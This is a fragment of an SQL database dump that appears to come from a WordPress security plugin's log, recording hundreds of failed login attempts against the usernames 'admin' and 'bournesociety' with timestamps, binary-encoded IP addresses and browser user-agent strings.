Firefox/62.0'),(5298,8696,1629580756.002988,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36'),(5299,8697,1629580793.996828,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���F�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5300,8698,1629581037.858817,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/sM�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'),(5301,8700,1629581468.245681,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��BF��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5302,8702,1629582088.662675,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\\̈�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5303,8704,1629582387.231397,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@sP','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5304,8705,1629582718.837627,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Ǽ��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5305,8707,1629583378.299760,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h%��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5306,8711,1629584380.201379,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Vw�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5307,8713,1629584690.336288,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/r�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5308,8714,1629585047.055131,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C�.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5309,8715,1629585385.505587,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"@�f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5310,8716,1629585708.504068,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5311,8717,1629585828.794821,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��P�Ҕ','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36'),(5312,8719,1629586447.817805,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���l��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5313,8722,1629587155.865203,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5314,8723,1629587488.153789,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���5�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5315,8725,1629588220.067215,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36'),(5316,8734,1629590692.125940,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@w�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5317,8735,1629591088.821974,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36'),(5318,8736,1629591092.688744,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��m�\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5319,8741,1629593016.812671,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��_��','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(5320,8742,1629593246.093824,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5321,8744,1629593997.033408,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5322,8746,1629594376.990218,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���q\0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5323,8749,1629595518.939150,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5324,8754,1629597063.115426,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��go(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5325,8755,1629597445.672553,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��+�)�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5326,8758,1629598207.815995,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����D','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5327,8760,1629599407.958947,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@u�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5328,8761,1629599818.291453,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��jK��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5329,8763,1629600610.690347,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���.yB','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5330,8764,1629601013.710329,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��{+�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5331,8765,1629601325.846286,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36'),(5332,8765,1629601326.572364,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36'),(5333,8766,1629601380.386318,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���捫','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),(5334,8770,1629602589.267128,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Y`Z}','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'),(5335,8771,1629602606.193168,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\\��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5336,8779,1629605318.235935,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����F','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5337,8780,1629605510.541836,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����aM','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),(5338,8781,1629605561.011017,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5339,8782,1629605870.411525,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����\"','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5340,8783,1629606109.803258,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\\̆�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5341,8784,1629606315.800712,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ν4�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5342,8785,1629606550.639964,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����P ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5343,8786,1629606677.189457,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h���','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36'),(5344,8787,1629606785.551176,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���z.�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5345,8788,1629607023.630853,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��£��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5346,8789,1629607268.136237,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���C','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5347,8790,1629607507.463262,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5348,8791,1629607723.344749,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@�X�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5349,8792,1629607827.797365,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'),(5350,8793,1629607970.050252,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��e�8','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5351,8794,1629608194.958166,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�t2','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5352,8795,1629608679.304053,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gx�V','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5353,8797,1629608982.156741,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���]�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(5354,8798,1629609121.129237,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��νUX','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5355,8799,1629609352.483581,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���RW�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5356,8800,1629609621.941830,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���[K	','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5357,8801,1629609846.653006,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����2','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5358,8802,1629610073.450901,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5359,8803,1629610104.593351,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"P�R','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'),(5360,8804,1629610315.754656,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Dt','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5361,8805,1629610540.222436,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5362,8806,1629610754.852495,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g/<,','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5363,8807,1629611007.877258,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5364,8808,1629611228.361892,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��vE��','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(5365,8809,1629611229.556431,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h+�5','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5366,8810,1629611471.790407,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>ҹ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5367,8811,1629611698.158181,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36'),(5368,8812,1629612119.251989,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5369,8813,1629612332.188451,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5370,8814,1629612345.751019,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��իо','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'),(5371,8815,1629612579.652908,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gx��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5372,8816,1629612797.932145,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-�x�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5373,8817,1629613014.548370,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��.��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5374,8818,1629613241.644432,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����y�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5375,8819,1629613485.605938,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����jQ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5376,8820,1629613723.464217,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5377,8821,1629613944.975204,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���[J�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5378,8822,1629614146.403274,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���k��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5379,8824,1629614583.751059,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���>|�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'),(5380,8825,1629614620.183928,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���_pO','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5381,8825,1629614620.287315,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���_pO','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5382,8826,1629614855.092927,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���e��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5383,8827,1629615109.098068,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���m~','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5384,8828,1629615340.215900,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����c','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5385,8829,1629615554.450663,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5386,8830,1629615711.230286,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��νY�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(5387,8831,1629615822.269592,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���ࣶ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5388,8831,1629615822.303656,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���ࣶ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5389,8832,1629616105.629780,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����t\r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5390,8833,1629616347.881804,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5391,8834,1629616601.887673,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>��G','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5392,8835,1629616835.485559,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����G�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(5393,8836,1629616837.295960,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���5T�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5394,8837,1629617087.073435,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5395,8838,1629617309.175268,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����R%','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5396,8839,1629617571.360868,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���갞','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5397,8840,1629617808.030525,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���_nq','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5398,8841,1629617950.395453,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����Kj','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36'),(5399,8842,1629618055.762920,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��`}��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5400,8843,1629618329.528124,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ÚW�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5401,8844,1629618341.107823,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��k�.5','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0'),(5402,8845,1629618596.313744,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5403,8846,1629618841.146234,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���kb','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5404,8846,1629618841.180068,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���kb','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5405,8847,1629619046.855684,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36'),(5406,8848,1629619112.762845,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h%��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5407,8858,1629624035.471673,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@Z(d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5408,8858,1629624035.538598,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@Z(d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5409,8859,1629624102.063920,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0�����\\','Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53'),(5410,8860,1629624622.710682,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Qӈ','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36'),(5411,8860,1629624622.751143,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Qӈ','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36'),(5412,8863,1629627722.367677,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@Z0h','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5413,8864,1629628042.863090,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���1N','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),(5414,8866,1629630355.192486,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(5415,8870,1629633844.453183,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���^�M','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(5416,8872,1629635022.927606,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�>','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),(5417,8873,1629635790.116314,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���ࣶ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5418,8879,1629640086.469914,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���KG�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5419,8879,1629640086.511228,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���KG�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5420,8881,1629641163.495831,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��DB�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5421,8885,1629642465.512798,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��6%','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5422,8887,1629643057.442203,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36'),(5423,8888,1629643170.514017,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;�\r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 